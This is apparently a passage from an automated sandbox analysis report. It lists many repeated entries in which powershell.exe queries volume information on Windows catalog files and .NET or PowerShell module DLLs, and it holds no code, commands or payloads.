Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
